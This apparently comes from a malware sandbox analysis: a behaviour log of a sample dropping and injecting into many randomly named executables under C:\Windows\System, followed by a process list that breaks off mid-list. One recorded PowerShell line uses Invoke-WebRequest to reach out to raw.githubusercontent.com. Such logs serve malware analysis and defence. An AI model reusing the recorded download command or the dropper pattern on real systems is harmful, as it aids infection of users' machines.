PID 1540 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\LDSfORn.exe
PID 1540 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\lYBDLYz.exe
PID 1540 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\lYBDLYz.exe
PID 1540 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\lYBDLYz.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\ldMzEqP.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\ldMzEqP.exe
PID 1540 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\ldMzEqP.exe
PID 1540 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\klciSum.exe
PID 1540 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\klciSum.exe
PID 1540 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\klciSum.exe
PID 1540 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\TnWlnjs.exe
PID 1540 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\TnWlnjs.exe
PID 1540 wrote to memory of 2416 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\TnWlnjs.exe
PID 1540 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\WVrYPUv.exe
PID 1540 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\WVrYPUv.exe
PID 1540 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\WVrYPUv.exe
PID 1540 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\jbgOyTK.exe
PID 1540 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\jbgOyTK.exe
PID 1540 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\jbgOyTK.exe
PID 1540 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\MtgIQZd.exe
PID 1540 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\MtgIQZd.exe
PID 1540 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\MtgIQZd.exe
PID 1540 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\nrQzQhy.exe
PID 1540 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\nrQzQhy.exe
PID 1540 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\nrQzQhy.exe
PID 1540 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\tPdArdM.exe
PID 1540 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\tPdArdM.exe
PID 1540 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\tPdArdM.exe
PID 1540 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\kBXQCHX.exe
PID 1540 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\kBXQCHX.exe
PID 1540 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\kBXQCHX.exe
PID 1540 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\YETLTUm.exe
PID 1540 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\YETLTUm.exe
PID 1540 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\YETLTUm.exe
PID 1540 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\noehAjo.exe
PID 1540 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\noehAjo.exe
PID 1540 wrote to memory of 1376 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\noehAjo.exe
PID 1540 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\EfjXvrd.exe
PID 1540 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\EfjXvrd.exe
PID 1540 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\EfjXvrd.exe
PID 1540 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\mjiQpnp.exe
PID 1540 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\mjiQpnp.exe
PID 1540 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\mjiQpnp.exe
PID 1540 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\GNpQeCZ.exe
PID 1540 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\GNpQeCZ.exe
PID 1540 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\GNpQeCZ.exe
PID 1540 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\hfQCXQu.exe
PID 1540 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\hfQCXQu.exe
PID 1540 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\hfQCXQu.exe
PID 1540 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\JRyJdAb.exe
PID 1540 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\JRyJdAb.exe
PID 1540 wrote to memory of 1980 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\JRyJdAb.exe
PID 1540 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\tqYpyyt.exe

Processes

C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\bksPibP.exe

C:\Windows\System\bksPibP.exe

C:\Windows\System\sOaBmhh.exe

C:\Windows\System\sOaBmhh.exe

C:\Windows\System\LDSfORn.exe

C:\Windows\System\LDSfORn.exe

C:\Windows\System\lYBDLYz.exe

C:\Windows\System\lYBDLYz.exe

C:\Windows\System\ldMzEqP.exe

C:\Windows\System\ldMzEqP.exe

C:\Windows\System\klciSum.exe

C:\Windows\System\klciSum.exe

C:\Windows\System\TnWlnjs.exe

C:\Windows\System\TnWlnjs.exe

C:\Windows\System\WVrYPUv.exe

C:\Windows\System\WVrYPUv.exe

C:\Windows\System\jbgOyTK.exe

C:\Windows\System\jbgOyTK.exe

C:\Windows\System\MtgIQZd.exe

C:\Windows\System\MtgIQZd.exe

C:\Windows\System\nrQzQhy.exe

C:\Windows\System\nrQzQhy.exe

C:\Windows\System\tPdArdM.exe

C:\Windows\System\tPdArdM.exe

C:\Windows\System\kBXQCHX.exe

C:\Windows\System\kBXQCHX.exe

C:\Windows\System\YETLTUm.exe

C:\Windows\System\YETLTUm.exe

C:\Windows\System\noehAjo.exe

C:\Windows\System\noehAjo.exe

C:\Windows\System\EfjXvrd.exe

C:\Windows\System\EfjXvrd.exe

C:\Windows\System\mjiQpnp.exe

C:\Windows\System\mjiQpnp.exe

C:\Windows\System\GNpQeCZ.exe

C:\Windows\System\GNpQeCZ.exe

C:\Windows\System\hfQCXQu.exe

C:\Windows\System\hfQCXQu.exe

C:\Windows\System\JRyJdAb.exe

C:\Windows\System\JRyJdAb.exe

C:\Windows\System\tqYpyyt.exe

C:\Windows\System\tqYpyyt.exe

C:\Windows\System\YYJcFTD.exe

C:\Windows\System\YYJcFTD.exe

C:\Windows\System\kzPiPMf.exe

C:\Windows\System\kzPiPMf.exe

C:\Windows\System\ovQpKfw.exe

C:\Windows\System\ovQpKfw.exe

C:\Windows\System\FrYSWat.exe

C:\Windows\System\FrYSWat.exe

C:\Windows\System\kAlSEYI.exe

C:\Windows\System\kAlSEYI.exe

C:\Windows\System\jNerXEI.exe

C:\Windows\System\jNerXEI.exe

C:\Windows\System\kicfqqD.exe

C:\Windows\System\kicfqqD.exe

C:\Windows\System\AnTVHxw.exe

C:\Windows\System\AnTVHxw.exe

C:\Windows\System\BEOTsRk.exe

C:\Windows\System\BEOTsRk.exe

C:\Windows\System\RfcxqqY.exe

C:\Windows\System\RfcxqqY.exe

C:\Windows\System\wPTZWWJ.exe

C:\Windows\System\wPTZWWJ.exe

C:\Windows\System\YAZtCAP.exe

C:\Windows\System\YAZtCAP.exe

C:\Windows\System\DycljJS.exe

C:\Windows\System\DycljJS.exe

C:\Windows\System\gQytUGo.exe

C:\Windows\System\gQytUGo.exe

C:\Windows\System\RbcrvoS.exe

C:\Windows\System\RbcrvoS.exe

C:\Windows\System\lnyzujt.exe

C:\Windows\System\lnyzujt.exe

C:\Windows\System\AULGNEv.exe

C:\Windows\System\AULGNEv.exe

C:\Windows\System\eSMWCwc.exe

C:\Windows\System\eSMWCwc.exe

C:\Windows\System\SBmSJtr.exe

C:\Windows\System\SBmSJtr.exe

C:\Windows\System\TgCSrtm.exe

C:\Windows\System\TgCSrtm.exe

C:\Windows\System\FSSJRJx.exe

C:\Windows\System\FSSJRJx.exe

C:\Windows\System\TXotyol.exe

C:\Windows\System\TXotyol.exe

C:\Windows\System\pFfrWLW.exe

C:\Windows\System\pFfrWLW.exe

C:\Windows\System\qXfFTDu.exe

C:\Windows\System\qXfFTDu.exe

C:\Windows\System\eAWDAZv.exe

C:\Windows\System\eAWDAZv.exe

C:\Windows\System\jJWcXfX.exe

C:\Windows\System\jJWcXfX.exe

C:\Windows\System\ksPrnDt.exe

C:\Windows\System\ksPrnDt.exe

C:\Windows\System\krChldk.exe

C:\Windows\System\krChldk.exe

C:\Windows\System\myLBLxL.exe

C:\Windows\System\myLBLxL.exe

C:\Windows\System\EraJdOQ.exe

C:\Windows\System\EraJdOQ.exe

C:\Windows\System\UBYxTKH.exe

C:\Windows\System\UBYxTKH.exe

C:\Windows\System\GgCCLxv.exe

C:\Windows\System\GgCCLxv.exe

C:\Windows\System\dmjbQDw.exe

C:\Windows\System\dmjbQDw.exe

C:\Windows\System\ekplTuL.exe

C:\Windows\System\ekplTuL.exe

C:\Windows\System\dFPjVtu.exe

C:\Windows\System\dFPjVtu.exe

C:\Windows\System\FbrTPSI.exe

C:\Windows\System\FbrTPSI.exe

C:\Windows\System\YyhEToY.exe

C:\Windows\System\YyhEToY.exe

C:\Windows\System\LvxqMTC.exe

C:\Windows\System\LvxqMTC.exe

C:\Windows\System\ADyChig.exe

C:\Windows\System\ADyChig.exe

C:\Windows\System\aqzKZVc.exe

C:\Windows\System\aqzKZVc.exe

C:\Windows\System\ZmMdKiq.exe

C:\Windows\System\ZmMdKiq.exe

C:\Windows\System\GzHzaUf.exe

C:\Windows\System\GzHzaUf.exe

C:\Windows\System\dGKvpzK.exe

C:\Windows\System\dGKvpzK.exe

C:\Windows\System\WcdLYJv.exe

C:\Windows\System\WcdLYJv.exe

C:\Windows\System\spCWdRF.exe

C:\Windows\System\spCWdRF.exe

C:\Windows\System\AZMXKXP.exe

C:\Windows\System\AZMXKXP.exe

C:\Windows\System\GyoTPbq.exe

C:\Windows\System\GyoTPbq.exe

C:\Windows\System\bpESksR.exe

C:\Windows\System\bpESksR.exe

C:\Windows\System\wiIqGqt.exe

C:\Windows\System\wiIqGqt.exe

C:\Windows\System\hPDLaUb.exe

C:\Windows\System\hPDLaUb.exe

C:\Windows\System\rscXzRh.exe

C:\Windows\System\rscXzRh.exe

C:\Windows\System\kEnVZMA.exe

C:\Windows\System\kEnVZMA.exe

C:\Windows\System\tLnRwKd.exe

C:\Windows\System\tLnRwKd.exe

C:\Windows\System\mhgwcKi.exe

C:\Windows\System\mhgwcKi.exe

C:\Windows\System\oBGNfgl.exe

C:\Windows\System\oBGNfgl.exe

C:\Windows\System\bBZrWLw.exe

C:\Windows\System\bBZrWLw.exe

C:\Windows\System\VddBoDC.exe

C:\Windows\System\VddBoDC.exe

C:\Windows\System\ZwvQemI.exe

C:\Windows\System\ZwvQemI.exe

C:\Windows\System\cJMEeNl.exe

C:\Windows\System\cJMEeNl.exe

C:\Windows\System\VLutGZW.exe

C:\Windows\System\VLutGZW.exe

C:\Windows\System\eArIrje.exe

C:\Windows\System\eArIrje.exe

C:\Windows\System\YknmHCQ.exe

C:\Windows\System\YknmHCQ.exe

C:\Windows\System\pKHwaxi.exe

C:\Windows\System\pKHwaxi.exe

C:\Windows\System\CqRoDtO.exe

C:\Windows\System\CqRoDtO.exe

C:\Windows\System\hJxRhIY.exe

C:\Windows\System\hJxRhIY.exe

C:\Windows\System\BNSSvsZ.exe

C:\Windows\System\BNSSvsZ.exe

C:\Windows\System\oHXBVCT.exe

C:\Windows\System\oHXBVCT.exe

C:\Windows\System\oNvvWVP.exe

C:\Windows\System\oNvvWVP.exe

C:\Windows\System\CHCOPHu.exe

C:\Windows\System\CHCOPHu.exe

C:\Windows\System\vpyDXst.exe

C:\Windows\System\vpyDXst.exe

C:\Windows\System\NEcKwbr.exe

C:\Windows\System\NEcKwbr.exe

C:\Windows\System\KXKehnN.exe

C:\Windows\System\KXKehnN.exe

C:\Windows\System\lCzzONz.exe

C:\Windows\System\lCzzONz.exe

C:\Windows\System\IXQSZZy.exe

C:\Windows\System\IXQSZZy.exe

C:\Windows\System\fJSIFIk.exe

C:\Windows\System\fJSIFIk.exe

C:\Windows\System\fbTpNJI.exe

C:\Windows\System\fbTpNJI.exe

C:\Windows\System\MrqoZVt.exe

C:\Windows\System\MrqoZVt.exe

C:\Windows\System\PNazaZH.exe

C:\Windows\System\PNazaZH.exe

C:\Windows\System\TNsLkyz.exe

C:\Windows\System\TNsLkyz.exe

C:\Windows\System\vhexDcQ.exe

C:\Windows\System\vhexDcQ.exe

C:\Windows\System\QDsGjsr.exe

C:\Windows\System\QDsGjsr.exe

C:\Windows\System\PzRTcjL.exe

C:\Windows\System\PzRTcjL.exe

C:\Windows\System\oUlCoPh.exe

C:\Windows\System\oUlCoPh.exe

C:\Windows\System\OtrMGTE.exe

C:\Windows\System\OtrMGTE.exe

C:\Windows\System\ypRKtkG.exe

C:\Windows\System\ypRKtkG.exe

C:\Windows\System\OLtKboW.exe

C:\Windows\System\OLtKboW.exe

C:\Windows\System\qemiOgL.exe

C:\Windows\System\qemiOgL.exe

C:\Windows\System\aiDaJnJ.exe

C:\Windows\System\aiDaJnJ.exe

C:\Windows\System\OxOYIxf.exe

C:\Windows\System\OxOYIxf.exe

C:\Windows\System\GTYgTuV.exe

C:\Windows\System\GTYgTuV.exe

C:\Windows\System\XjwQacu.exe

C:\Windows\System\XjwQacu.exe

C:\Windows\System\ktvvMzg.exe

C:\Windows\System\ktvvMzg.exe

C:\Windows\System\bMHevrf.exe

C:\Windows\System\bMHevrf.exe

C:\Windows\System\tXCPYhK.exe

C:\Windows\System\tXCPYhK.exe

C:\Windows\System\NYaCaPs.exe

C:\Windows\System\NYaCaPs.exe

C:\Windows\System\epzJRWu.exe

C:\Windows\System\epzJRWu.exe

C:\Windows\System\jpEVWLW.exe

C:\Windows\System\jpEVWLW.exe

C:\Windows\System\JiqFzWd.exe

C:\Windows\System\JiqFzWd.exe

C:\Windows\System\jQcNagE.exe

C:\Windows\System\jQcNagE.exe

C:\Windows\System\KFBLayl.exe

C:\Windows\System\KFBLayl.exe

C:\Windows\System\ZPHMDyr.exe

C:\Windows\System\ZPHMDyr.exe

C:\Windows\System\WMMywhQ.exe

C:\Windows\System\WMMywhQ.exe

C:\Windows\System\HtKEWxJ.exe

C:\Windows\System\HtKEWxJ.exe

C:\Windows\System\yWMJxys.exe

C:\Windows\System\yWMJxys.exe

C:\Windows\System\rEYpYLF.exe

C:\Windows\System\rEYpYLF.exe

C:\Windows\System\PRERWSr.exe

C:\Windows\System\PRERWSr.exe

C:\Windows\System\rpttmge.exe

C:\Windows\System\rpttmge.exe

C:\Windows\System\ZgIcQtu.exe

C:\Windows\System\ZgIcQtu.exe

C:\Windows\System\Xubfapo.exe

C:\Windows\System\Xubfapo.exe

C:\Windows\System\VtubjvG.exe

C:\Windows\System\VtubjvG.exe

C:\Windows\System\oqacBhV.exe

C:\Windows\System\oqacBhV.exe

C:\Windows\System\EswcmHV.exe

C:\Windows\System\EswcmHV.exe

C:\Windows\System\xETTuKH.exe

C:\Windows\System\xETTuKH.exe

C:\Windows\System\QlPyohz.exe

C:\Windows\System\QlPyohz.exe

C:\Windows\System\eaFNEcu.exe

C:\Windows\System\eaFNEcu.exe

C:\Windows\System\NFcZvzO.exe

C:\Windows\System\NFcZvzO.exe

C:\Windows\System\CDqlJfM.exe

C:\Windows\System\CDqlJfM.exe

C:\Windows\System\rzBZKxg.exe

C:\Windows\System\rzBZKxg.exe

C:\Windows\System\AOgbzWm.exe

C:\Windows\System\AOgbzWm.exe

C:\Windows\System\kfeRuYi.exe

C:\Windows\System\kfeRuYi.exe

C:\Windows\System\MaApUAi.exe

C:\Windows\System\MaApUAi.exe

C:\Windows\System\UIypQzA.exe

C:\Windows\System\UIypQzA.exe

C:\Windows\System\POCiJcD.exe

C:\Windows\System\POCiJcD.exe

C:\Windows\System\GwNbHKk.exe

C:\Windows\System\GwNbHKk.exe

C:\Windows\System\xCdnuUF.exe

C:\Windows\System\xCdnuUF.exe

C:\Windows\System\rrVKMhh.exe

C:\Windows\System\rrVKMhh.exe

C:\Windows\System\jbWhCKF.exe

C:\Windows\System\jbWhCKF.exe

C:\Windows\System\CtaQCYW.exe

C:\Windows\System\CtaQCYW.exe

C:\Windows\System\EzsAoAs.exe

C:\Windows\System\EzsAoAs.exe

C:\Windows\System\icOUGKM.exe

C:\Windows\System\icOUGKM.exe

C:\Windows\System\QOyNgeo.exe

C:\Windows\System\QOyNgeo.exe

C:\Windows\System\EEsyxSs.exe

C:\Windows\System\EEsyxSs.exe

C:\Windows\System\fhkyEza.exe

C:\Windows\System\fhkyEza.exe

C:\Windows\System\lMVXjcg.exe

C:\Windows\System\lMVXjcg.exe

C:\Windows\System\LfDPkns.exe

C:\Windows\System\LfDPkns.exe

C:\Windows\System\LuiToAg.exe

C:\Windows\System\LuiToAg.exe

C:\Windows\System\akjRfQO.exe

C:\Windows\System\akjRfQO.exe

C:\Windows\System\lDPkeXc.exe

C:\Windows\System\lDPkeXc.exe

C:\Windows\System\tNEuCsy.exe

C:\Windows\System\tNEuCsy.exe

C:\Windows\System\Hxnbnwu.exe

C:\Windows\System\Hxnbnwu.exe

C:\Windows\System\sckTgGS.exe

C:\Windows\System\sckTgGS.exe

C:\Windows\System\BRfJydc.exe

C:\Windows\System\BRfJydc.exe

C:\Windows\System\VKWeRrE.exe

C:\Windows\System\VKWeRrE.exe

C:\Windows\System\DdWDVdZ.exe

C:\Windows\System\DdWDVdZ.exe

C:\Windows\System\erAwMzM.exe

C:\Windows\System\erAwMzM.exe

C:\Windows\System\UVXhCRO.exe

C:\Windows\System\UVXhCRO.exe

C:\Windows\System\tywiXaU.exe

C:\Windows\System\tywiXaU.exe

C:\Windows\System\KmTYwUT.exe

C:\Windows\System\KmTYwUT.exe

C:\Windows\System\OukbDcl.exe

C:\Windows\System\OukbDcl.exe

C:\Windows\System\XhlPpxY.exe

C:\Windows\System\XhlPpxY.exe

C:\Windows\System\RcjMeHZ.exe

C:\Windows\System\RcjMeHZ.exe

C:\Windows\System\pYGWhsr.exe

C:\Windows\System\pYGWhsr.exe

C:\Windows\System\nbBDMMH.exe

C:\Windows\System\nbBDMMH.exe

C:\Windows\System\qKtpuuz.exe

C:\Windows\System\qKtpuuz.exe

C:\Windows\System\aNxFyiY.exe

C:\Windows\System\aNxFyiY.exe

C:\Windows\System\dYHaSzH.exe

C:\Windows\System\dYHaSzH.exe

C:\Windows\System\zezbwos.exe

C:\Windows\System\zezbwos.exe

C:\Windows\System\lluIYIC.exe

C:\Windows\System\lluIYIC.exe

C:\Windows\System\XsijQuJ.exe

C:\Windows\System\XsijQuJ.exe

C:\Windows\System\yxEEkDG.exe

C:\Windows\System\yxEEkDG.exe

C:\Windows\System\TqXlHCB.exe

C:\Windows\System\TqXlHCB.exe

C:\Windows\System\opJZtWE.exe

C:\Windows\System\opJZtWE.exe

C:\Windows\System\cyNjIMA.exe

C:\Windows\System\cyNjIMA.exe

C:\Windows\System\xYJNJgn.exe

C:\Windows\System\xYJNJgn.exe

C:\Windows\System\iWxLIIv.exe

C:\Windows\System\iWxLIIv.exe

C:\Windows\System\MNMmtoR.exe

C:\Windows\System\MNMmtoR.exe

C:\Windows\System\wMAICal.exe

C:\Windows\System\wMAICal.exe

C:\Windows\System\NsqMfYW.exe

C:\Windows\System\NsqMfYW.exe

C:\Windows\System\nbPqkng.exe

C:\Windows\System\nbPqkng.exe

C:\Windows\System\cwIoVIn.exe

C:\Windows\System\cwIoVIn.exe

C:\Windows\System\sfLDnSo.exe

C:\Windows\System\sfLDnSo.exe

C:\Windows\System\xGZnAIa.exe

C:\Windows\System\xGZnAIa.exe

C:\Windows\System\JKfMDzI.exe

C:\Windows\System\JKfMDzI.exe

C:\Windows\System\BlILZXC.exe

C:\Windows\System\BlILZXC.exe

C:\Windows\System\rCxYLhQ.exe

C:\Windows\System\rCxYLhQ.exe

C:\Windows\System\cFZWwGI.exe

C:\Windows\System\cFZWwGI.exe

C:\Windows\System\HqQCczm.exe

C:\Windows\System\HqQCczm.exe

C:\Windows\System\AzNghIS.exe

C:\Windows\System\AzNghIS.exe

C:\Windows\System\pnGLyrE.exe

C:\Windows\System\pnGLyrE.exe

C:\Windows\System\oTWApJp.exe

C:\Windows\System\oTWApJp.exe

C:\Windows\System\tSFGEec.exe

C:\Windows\System\tSFGEec.exe

C:\Windows\System\wnBqYUc.exe

C:\Windows\System\wnBqYUc.exe

C:\Windows\System\xZIkWrn.exe

C:\Windows\System\xZIkWrn.exe

C:\Windows\System\gwLIoJP.exe

C:\Windows\System\gwLIoJP.exe

C:\Windows\System\QYVejUr.exe

C:\Windows\System\QYVejUr.exe

C:\Windows\System\pVXEpnF.exe

C:\Windows\System\pVXEpnF.exe

C:\Windows\System\xtbjWgT.exe

C:\Windows\System\xtbjWgT.exe

C:\Windows\System\LFCkuOS.exe

C:\Windows\System\LFCkuOS.exe

C:\Windows\System\ivYNGPt.exe

C:\Windows\System\ivYNGPt.exe

C:\Windows\System\sFzhGEM.exe

C:\Windows\System\sFzhGEM.exe

C:\Windows\System\hGTYKIs.exe

C:\Windows\System\hGTYKIs.exe

C:\Windows\System\pizPFLL.exe

C:\Windows\System\pizPFLL.exe

C:\Windows\System\kxgACSN.exe

C:\Windows\System\kxgACSN.exe

C:\Windows\System\MLQwkOO.exe

C:\Windows\System\MLQwkOO.exe

C:\Windows\System\TbxFkmX.exe

C:\Windows\System\TbxFkmX.exe

C:\Windows\System\NfnDnWx.exe

C:\Windows\System\NfnDnWx.exe

C:\Windows\System\XNaVlMT.exe

C:\Windows\System\XNaVlMT.exe

C:\Windows\System\fKdLtpd.exe

C:\Windows\System\fKdLtpd.exe

C:\Windows\System\qucaYJg.exe

C:\Windows\System\qucaYJg.exe

C:\Windows\System\LohrIXJ.exe

C:\Windows\System\LohrIXJ.exe

C:\Windows\System\EQhlHtG.exe

C:\Windows\System\EQhlHtG.exe

C:\Windows\System\HQAwrEy.exe

C:\Windows\System\HQAwrEy.exe

C:\Windows\System\lsjsAwJ.exe

C:\Windows\System\lsjsAwJ.exe

C:\Windows\System\QRBvwvH.exe

C:\Windows\System\QRBvwvH.exe

C:\Windows\System\QXjREnJ.exe

C:\Windows\System\QXjREnJ.exe

C:\Windows\System\rEriiFP.exe

C:\Windows\System\rEriiFP.exe

C:\Windows\System\ZpPGQyh.exe

C:\Windows\System\ZpPGQyh.exe

C:\Windows\System\nojFAPA.exe

C:\Windows\System\nojFAPA.exe

C:\Windows\System\ZEqgEoA.exe

C:\Windows\System\ZEqgEoA.exe

C:\Windows\System\vwUZuJW.exe

C:\Windows\System\vwUZuJW.exe

C:\Windows\System\KekqICJ.exe

C:\Windows\System\KekqICJ.exe

C:\Windows\System\PptNpLl.exe

C:\Windows\System\PptNpLl.exe

C:\Windows\System\peTHmpj.exe

C:\Windows\System\peTHmpj.exe

C:\Windows\System\bzCskmJ.exe

C:\Windows\System\bzCskmJ.exe

C:\Windows\System\Qvrzohm.exe

C:\Windows\System\Qvrzohm.exe

C:\Windows\System\LQdqtaL.exe

C:\Windows\System\LQdqtaL.exe

C:\Windows\System\hdFnrRo.exe

C:\Windows\System\hdFnrRo.exe

C:\Windows\System\TFTtcel.exe

C:\Windows\System\TFTtcel.exe

C:\Windows\System\IyHqXgN.exe

C:\Windows\System\IyHqXgN.exe

C:\Windows\System\sDVznqD.exe

C:\Windows\System\sDVznqD.exe

C:\Windows\System\yBvHeLA.exe

C:\Windows\System\yBvHeLA.exe

C:\Windows\System\QjzJNPc.exe

C:\Windows\System\QjzJNPc.exe

C:\Windows\System\agIntIC.exe

C:\Windows\System\agIntIC.exe

C:\Windows\System\BfVnJNd.exe

C:\Windows\System\BfVnJNd.exe

C:\Windows\System\rCFyTgz.exe

C:\Windows\System\rCFyTgz.exe

C:\Windows\System\FFnEGwm.exe

C:\Windows\System\FFnEGwm.exe

C:\Windows\System\QXacXoC.exe

